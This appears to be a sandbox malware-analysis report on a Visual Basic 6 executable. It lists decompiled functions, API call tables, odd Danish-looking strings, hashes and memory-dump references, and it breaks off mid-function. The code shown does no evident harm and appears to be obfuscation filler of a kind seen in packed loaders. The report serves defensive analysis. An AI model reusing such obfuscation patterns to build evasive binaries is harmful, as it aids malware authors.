				void* _v56;
				char _v60;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v120;
				intOrPtr _v128;
				signed int* _v136;
				char _v144;
				signed int _v148;
				short _v152;
				signed int _v164;
				signed int* _t54;
				signed int _t56;
				short _t58;
				char* _t61;
				char* _t67;
				void* _t95;
				intOrPtr _t96;

				_t96 = _t95 - 0xc;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t96;
				L00401540();
				_v16 = _t96;
				_v12 = 0x401380;
				L004017B6();
				L004017B6();
				_t54 = _a24;
				 *_t54 =  *_t54 & 0x00000000;
				_push(L"Dukkestuer");
				L00401762();
				_v136 = _t54;
				_v144 = 0x8003;
				_v72 =  *0x401378;
				_v80 = 4;
				_push( &_v96);
				_t56 =  &_v80;
				_push(_t56);
				L004017A4();
				_v148 = _t56;
				if(_v148 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(_v148);
					L0040179E();
					_v164 = _t56;
				}
				_push( &_v144);
				_t58 =  &_v96;
				_push(_t58);
				L004016AE();
				_v152 = _t58;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t61 = _v152;
				if(_t61 != 0) {
					_push( &_v80);
					L00401654();
					L0040174A();
					_v88 = 5;
					_v96 = 2;
					_v120 = L"LAAGETS";
					_v128 = 8;
					L0040184C();
					_push( &_v96);
					_push(5);
					_push( &_v80);
					_push( &_v112);
					L0040168A();
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push( &_v112);
					_t67 =  &_v60;
					_push(_t67);
					L00401858();
					_push(_t67);
					_push(L"SNVRET");
					_push(L"OVERBEBYRDES");
					L004016D8();
					L0040183A();
					_push(_t67);
					L004017B0();
					L0040183A();
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L004017D4();
					_push( &_v112);
					_push( &_v96);
					_t61 =  &_v80;
					_push(_t61);
					_push(3);
					L00401840();
				}
				L004017B6();
				asm("wait");
				_push(0x41f526);
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t61;
			}

0x0041f321
0x0041f324
0x0041f32f
0x0041f330
0x0041f33c
0x0041f344
0x0041f347
0x0041f354
0x0041f35f
0x0041f364
0x0041f367
0x0041f36a
0x0041f36f
0x0041f374
0x0041f37a
0x0041f38a
0x0041f38d
0x0041f397
0x0041f398
0x0041f39b
0x0041f39c
0x0041f3a1
0x0041f3ae
0x0041f3c3
0x0041f3b0
0x0041f3b0
0x0041f3b6
0x0041f3bb
0x0041f3bb
0x0041f3d0
0x0041f3d1
0x0041f3d4
0x0041f3d5
0x0041f3da
0x0041f3e4
0x0041f3e8
0x0041f3e9
0x0041f3eb
0x0041f3f3
0x0041f3fc
0x0041f405
0x0041f406
0x0041f411
0x0041f416
0x0041f41d
0x0041f424
0x0041f42b
0x0041f438
0x0041f440
0x0041f441
0x0041f446
0x0041f44a
0x0041f44b
0x0041f450
0x0041f452
0x0041f454
0x0041f459
0x0041f45a
0x0041f45d
0x0041f45e
0x0041f463
0x0041f464
0x0041f469
0x0041f46e
0x0041f478
0x0041f47d
0x0041f47e
0x0041f488
0x0041f490
0x0041f494
0x0041f495
0x0041f497
0x0041f4a2
0x0041f4a6
0x0041f4a7
0x0041f4aa
0x0041f4ab
0x0041f4ad
0x0041f4b2
0x0041f4bd
0x0041f4c2
0x0041f4c3
0x0041f508
0x0041f510
0x0041f518
0x0041f520
0x0041f525

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F33C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F354
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F35F
__vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F36F
#564.MSVBVM60(00000004,?), ref: 0041F39C
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F3B6
__vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F3D5
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F3EB
#546.MSVBVM60(?,?,?,00401546), ref: 0041F406
__vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F411
__vbaVarDup.MSVBVM60 ref: 0041F438
#629.MSVBVM60(?,?,00000005,00000002), ref: 0041F44B
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F45E
#712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F46E
__vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F478
#527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F47E
__vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F488
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F497
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F4AD
__vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F4BD
__vbaFreeStr.MSVBVM60(0041F526,?,?,00401546), ref: 0041F508
__vbaFreeStr.MSVBVM60(0041F526,?,?,00401546), ref: 0041F510
__vbaFreeVar.MSVBVM60(0041F526,?,?,00401546), ref: 0041F518
__vbaFreeStr.MSVBVM60(0041F526,?,?,00401546), ref: 0041F520

Strings

OVERBEBYRDES, xrefs: 0041F469
Dukkestuer, xrefs: 0041F36A
Antievangelical9, xrefs: 0041F4B5
SNVRET, xrefs: 0041F464
LAAGETS, xrefs: 0041F424

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
API String ID: 3927249403-1920341584
Opcode ID: 97c0590f2807978d3ad349704e9c25ddbcc2a75891fce037fee68b45005be11f
Instruction ID: c5e0310e442c1fc63c8630c01528c66992ce604f470dedb83ecca95e677437e3
Opcode Fuzzy Hash: 97c0590f2807978d3ad349704e9c25ddbcc2a75891fce037fee68b45005be11f
Instruction Fuzzy Hash: 4251FA72D0020DABDB10EBE1C846FDEB778AF04704F10817BB515B71E1EB785A498B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9A9, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041E9A9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char* _v92;
				intOrPtr _v100;
				signed int* _t37;
				char* _t40;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t67 = _t66 - 0xc;
				 *[fs:0x0] = _t67;
				L00401540();
				_v16 = _t67;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401546, _t64);
				_t37 = _a16;
				 *_t37 =  *_t37 & 0x00000000;
				_push(0xb5);
				_push(L"SKADESLSHOLDELSERNE");
				_push(L"Fritgaaende");
				_push(0);
				L00401690();
				if(_t37 == 0xa2) {
					_v60 = 0xfe;
					_v68 = 2;
					_v92 = L"Flskekdet";
					_v100 = 8;
					L0040184C();
					_push( &_v68);
					_push(0x48);
					_push( &_v52);
					_push( &_v84);
					L0040168A();
					_push( &_v84);
					L00401834();
					L0040183A();
					_push( &_v84);
					_push( &_v68);
					_push( &_v52);
					_push(3);
					L00401840();
					_push(0x4f);
					_push(0x9e);
					_push(0x14);
					_push( &_v52);
					L00401684();
					_t37 =  &_v52;
					_push(_t37);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"GILENO");
				L004017EC();
				_push(_t37);
				_push( &_v52);
				L0040167E();
				_t40 =  &_v52;
				_push(_t40);
				L00401834();
				L0040183A();
				L00401828();
				_push(0x41eb13);
				L00401846();
				L00401846();
				return _t40;
			}

0x0041e9ac
0x0041e9bb
0x0041e9c5
0x0041e9cd
0x0041e9d0
0x0041e9d7
0x0041e9e6
0x0041e9e9
0x0041e9ec
0x0041e9ef
0x0041e9f4
0x0041e9f9
0x0041e9fe
0x0041ea00
0x0041ea0a
0x0041ea10
0x0041ea17
0x0041ea1e
0x0041ea25
0x0041ea32
0x0041ea3a
0x0041ea3b
0x0041ea40
0x0041ea44
0x0041ea45
0x0041ea4d
0x0041ea4e
0x0041ea58
0x0041ea60
0x0041ea64
0x0041ea68
0x0041ea69
0x0041ea6b
0x0041ea73
0x0041ea75
0x0041ea7a
0x0041ea7f
0x0041ea80
0x0041ea85
0x0041ea88
0x0041ea89
0x0041ea93
0x0041ea9b
0x0041ea9b
0x0041eaa0
0x0041eaa5
0x0041eaad
0x0041eab1
0x0041eab2
0x0041eab7
0x0041eaba
0x0041eabb
0x0041eac5
0x0041eacd
0x0041ead2
0x0041eb05
0x0041eb0d
0x0041eb12

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041E9C5
__vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EA00
__vbaVarDup.MSVBVM60 ref: 0041EA32
#629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041EA45
__vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041EA4E
__vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041EA58
__vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041EA6B
#539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EA80
__vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EA89
__vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EA93
__vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EA9B
#696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EAA5
#698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EAB2
__vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EABB
__vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EAC5
__vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EACD
__vbaFreeStr.MSVBVM60(0041EB13,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EB05
__vbaFreeStr.MSVBVM60(0041EB13,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EB0D

Strings

GILENO, xrefs: 0041EAA0
Flskekdet, xrefs: 0041EA1E
SKADESLSHOLDELSERNE, xrefs: 0041E9F4
Fritgaaende, xrefs: 0041E9F9

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$#539#629#696#698ChkstkList
String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
API String ID: 1195518721-3815085929
Opcode ID: 792bcc5b0b5771924dc76fa28966765902c0f0f24e719fc757ddec4d17a03b91
Instruction ID: 80a007722e124d3b8b95c9007be0cbd2b36adfb14f404f2829f5d4aadfea0baa
Opcode Fuzzy Hash: 792bcc5b0b5771924dc76fa28966765902c0f0f24e719fc757ddec4d17a03b91
Instruction Fuzzy Hash: 7031C972940258ABDB00FBD1DD86FEE77B8AF04704F54442AB501BB1E1DB78AA09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00420967, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00420967(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v40;
				void* _v44;
				void* _v48;
				intOrPtr _v52;
				void* _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				short _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				intOrPtr* _v256;
				signed int _v260;
				signed int _v264;
				char* _t91;
				short _t93;
				short _t100;
				signed int _t106;
				signed int _t110;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t125 = _t124 - 0x18;
				 *[fs:0x0] = _t125;
				L00401540();
				_v28 = _t125;
				_v24 = 0x401470;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t122);
				_v8 = 1;
				_v8 = 2;
				if(0 != 0) {
					_v8 = 3;
					L004017AA();
					_v52 = __fp0;
					_v8 = 4;
					if( *0x4223c0 != 0) {
						_v256 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v256 = 0x4223c0;
					}
					_v220 =  *_v256;
					_t106 =  *((intOrPtr*)( *_v220 + 0x4c))(_v220,  &_v56);
					asm("fclex");
					_v224 = _t106;
					if(_v224 >= 0) {
						_v260 = _v260 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40257c);
						_push(_v220);
						_push(_v224);
						L004017C8();
						_v260 = _t106;
					}
					_v228 = _v56;
					_t110 =  *((intOrPtr*)( *_v228 + 0x28))(_v228);
					asm("fclex");
					_v232 = _t110;
					if(_v232 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x402ed8);
						_push(_v228);
						_push(_v232);
						L004017C8();
						_v264 = _t110;
					}
					L004017C2();
				}
				_v8 = 6;
				_v64 = 0x637f55;
				_v72 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v72);
				L0040161E();
				L0040183A();
				L00401828();
				_v8 = 7;
				_v64 = 0x1f1c50;
				_v72 = 3;
				_push( &_v72);
				_push( &_v88);
				L00401678();
				_v96 = 0xc1;
				_v104 = 2;
				_push( &_v104);
				_push(0xe7);
				_push( &_v88);
				_push( &_v120);
				L004015F4();
				_v128 = 0x1a6490;
				_v136 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t91 =  &_v136;
				_push(_t91);
				L004015EE();
				_v144 = _t91;
				_v152 = 0x8008;
				_push( &_v120);
				_t93 =  &_v152;
				_push(_t93);
				L00401660();
				_v220 = _t93;
				_push( &_v152);
				_push( &_v120);
				_push( &_v136);
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push(6);
				L00401840();
				_t100 = _v220;
				if(_t100 != 0) {
					_v8 = 8;
					_push(0xffffffff);
					L004016E4();
					_v8 = 9;
					_push(L"Cryptodeist");
					L004017B0();
					L0040183A();
				}
				_v8 = 0xb;
				_v40 = 0x85ca67;
				asm("wait");
				_push(0x420c46);
				L00401846();
				L00401846();
				return _t100;
			}

0x0042096a
0x00420979
0x00420985
0x0042098d
0x00420990
0x00420997
0x0042099e
0x004209ad
0x004209b0
0x004209b7
0x004209c2
0x004209c8
0x004209cf
0x004209d4
0x004209d7
0x004209e5
0x00420a02
0x004209e7
0x004209e7
0x004209ec
0x004209f1
0x004209f6
0x004209f6
0x00420a14
0x00420a2c
0x00420a2f
0x00420a31
0x00420a3e
0x00420a60
0x00420a40
0x00420a40
0x00420a42
0x00420a47
0x00420a4d
0x00420a53
0x00420a58
0x00420a58
0x00420a6a
0x00420a7e
0x00420a81
0x00420a83
0x00420a90
0x00420ab2
0x00420a92
0x00420a92
0x00420a94
0x00420a99
0x00420a9f
0x00420aa5
0x00420aaa
0x00420aaa
0x00420abc
0x00420abc
0x00420ac1
0x00420ac8
0x00420acf
0x00420ad6
0x00420ad8
0x00420ada
0x00420adc
0x00420ae1
0x00420ae2
0x00420aec
0x00420af4
0x00420af9
0x00420b00
0x00420b07
0x00420b11
0x00420b15
0x00420b16
0x00420b1b
0x00420b22
0x00420b2c
0x00420b2d
0x00420b35
0x00420b39
0x00420b3a
0x00420b3f
0x00420b46
0x00420b50
0x00420b52
0x00420b54
0x00420b56
0x00420b58
0x00420b5e
0x00420b5f
0x00420b64
0x00420b6a
0x00420b77
0x00420b78
0x00420b7e
0x00420b7f
0x00420b84
0x00420b91
0x00420b95
0x00420b9c
0x00420ba0
0x00420ba4
0x00420ba8
0x00420ba9
0x00420bab
0x00420bb3
0x00420bbc
0x00420bbe
0x00420bc5
0x00420bc7
0x00420bcc
0x00420bd3
0x00420bd8
0x00420be2
0x00420be2
0x00420be7
0x00420bee
0x00420bf5
0x00420bf6
0x00420c38
0x00420c40
0x00420c45

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420985
#535.MSVBVM60(?,?,?,?,00401546), ref: 004209CF
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,?,00401546), ref: 004209F1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,0000004C), ref: 00420A53
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402ED8,00000028), ref: 00420AA5
__vbaFreeObj.MSVBVM60(00000000,?,00402ED8,00000028), ref: 00420ABC
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420AE2
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420AEC
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420AF4
#613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420B16
#632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420B3A
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 00420B5F
__vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 00420B7F
__vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420BAB
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420BC7
#527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420BD8
__vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420BE2
__vbaFreeStr.MSVBVM60(00420C46), ref: 00420C38
__vbaFreeStr.MSVBVM60(00420C46), ref: 00420C40

Strings

Cryptodeist, xrefs: 00420BD3

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
String ID: Cryptodeist
API String ID: 3497234973-3010629389
Opcode ID: 4d84a0bcfb7bfbb7f2d1f1b86af96cbeab2c02cd8ef88536f9ec5f67f86db732
Instruction ID: e72bbe9dc01ec8dd27a97ee2d0d9112797095cbfa56676e4da504ca801a9bcef
Opcode Fuzzy Hash: 4d84a0bcfb7bfbb7f2d1f1b86af96cbeab2c02cd8ef88536f9ec5f67f86db732
Instruction Fuzzy Hash: F67129B1900258EBDB10DF91CE45BDEB7B8AF04314F6086AAE115B71E1DB785B88CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00420319, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00420319(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v68;
				signed int _t39;
				signed int _t43;
				signed int _t49;
				intOrPtr _t66;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_t39 = 0x30;
				L00401540();
				_v12 = _t66;
				_v8 = 0x4013e0;
				L00401612();
				L0040183A();
				_push(_t39);
				_push(L"Skimmia");
				L0040172C();
				asm("sbb eax, eax");
				_v40 =  ~( ~_t39 + 1);
				L00401846();
				_t43 = _v40;
				if(_t43 != 0) {
					_push(0x47);
					L00401786();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v60 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v60 = 0x4223c0;
					}
					_v40 =  *_v60;
					_t49 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
					asm("fclex");
					_v44 = _t49;
					if(_v44 >= 0) {
						_v64 = _v64 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v40);
						_push(_v44);
						L004017C8();
						_v64 = _t49;
					}
					_v48 = _v36;
					_t43 =  *((intOrPtr*)( *_v48 + 0x138))(_v48, L"Printermanualen", 1);
					asm("fclex");
					_v52 = _t43;
					if(_v52 >= 0) {
						_v68 = _v68 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x40259c);
						_push(_v48);
						_push(_v52);
						L004017C8();
						_v68 = _t43;
					}
					L004017C2();
				}
				_v24 = 0x5a4c00;
				_push(0x420469);
				L00401846();
				return _t43;
			}

0x0042031e
0x00420329
0x0042032a
0x00420333
0x00420334
0x0042033c
0x0042033f
0x00420346
0x00420350
0x00420355
0x00420356
0x0042035b
0x00420362
0x00420367
0x0042036e
0x00420373
0x00420379
0x0042037f
0x00420381
0x0042038b
0x00420397
0x004203b1
0x00420399
0x00420399
0x0042039e
0x004203a3
0x004203a8
0x004203a8
0x004203bd
0x004203cc
0x004203cf
0x004203d1
0x004203d8
0x004203f1
0x004203da
0x004203da
0x004203dc
0x004203e1
0x004203e4
0x004203e7
0x004203ec
0x004203ec
0x004203f8
0x0042040a
0x00420410
0x00420412
0x00420419
0x00420435
0x0042041b
0x0042041b
0x00420420
0x00420425
0x00420428
0x0042042b
0x00420430
0x00420430
0x0042043c
0x0042043c
0x00420441
0x00420448
0x00420463
0x00420468

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420334
#669.MSVBVM60(?,?,?,?,00401546), ref: 00420346
__vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 00420350
__vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042035B
__vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042036E
#537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420381
__vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042038B
__vbaNew2.MSVBVM60(0040258C,004223C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004203A3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004203E7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042042B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042043C
__vbaFreeStr.MSVBVM60(00420469,Skimmia,00000000,?,?,?,?,00401546), ref: 00420463

Strings

Printermanualen, xrefs: 004203FD
Skimmia, xrefs: 00420356

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
String ID: Printermanualen$Skimmia
API String ID: 2004920347-2169568590
Opcode ID: b61a4e0b07b356246ed6dd7dee1fd5942192a92bbf41aed2dd0e0acf5bfa9d31
Instruction ID: 9cc1c95e906380b6d7c0f54b086d1f35f63e296d71be5c7c2db48c6832f924cb
Opcode Fuzzy Hash: b61a4e0b07b356246ed6dd7dee1fd5942192a92bbf41aed2dd0e0acf5bfa9d31
Instruction Fuzzy Hash: DA31FC71A50218AFDB00EFA5D985BEDBBF4BF08704F60402AF501B71E1DBB85945CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDDC, Relevance: 22.6, APIs: 15, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EDF8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE22
__vbaVarDup.MSVBVM60 ref: 0041EE49
#607.MSVBVM60(?,000000BB,?), ref: 0041EE5B
__vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041EE64
__vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041EE6E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041EE7D
#717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041EE9E
__vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041EEA7
__vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041EEB1
__vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041EEB9
__vbaFreeStr.MSVBVM60(0041EEFC,?,?,?,?,00401546), ref: 0041EEDB
__vbaAryDestruct.MSVBVM60(00000000,?,0041EEFC,?,?,?,?,00401546), ref: 0041EEE6
__vbaFreeStr.MSVBVM60(00000000,?,0041EEFC,?,?,?,?,00401546), ref: 0041EEEE
__vbaFreeStr.MSVBVM60(00000000,?,0041EEFC,?,?,?,?,00401546), ref: 0041EEF6

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
String ID:
API String ID: 1752509113-0
Opcode ID: b9be95959dce452ec7a98c79e9863dc0c18b11ac0bcb5f4ff059d9f793dddc06
Instruction ID: 4441adc35d77bd4c428dfc6f103f2216e8ae7621525d35b4c9a06c477ca7186b
Opcode Fuzzy Hash: b9be95959dce452ec7a98c79e9863dc0c18b11ac0bcb5f4ff059d9f793dddc06
Instruction Fuzzy Hash: 9931DE76900248ABDB04FBD1C986BDEB7B9AF04704F50843AB505B71E1EB786B09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC09, Relevance: 16.5, APIs: 11, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041FC09(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _t24;
				void* _t38;
				void* _t40;
				intOrPtr _t41;

				_t41 = _t40 - 0xc;
				 *[fs:0x0] = _t41;
				L00401540();
				_v16 = _t41;
				_v12 = 0x4013c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401546, _t38);
				L004017B6();
				L004017B6();
				_push( &_v52);
				L00401636();
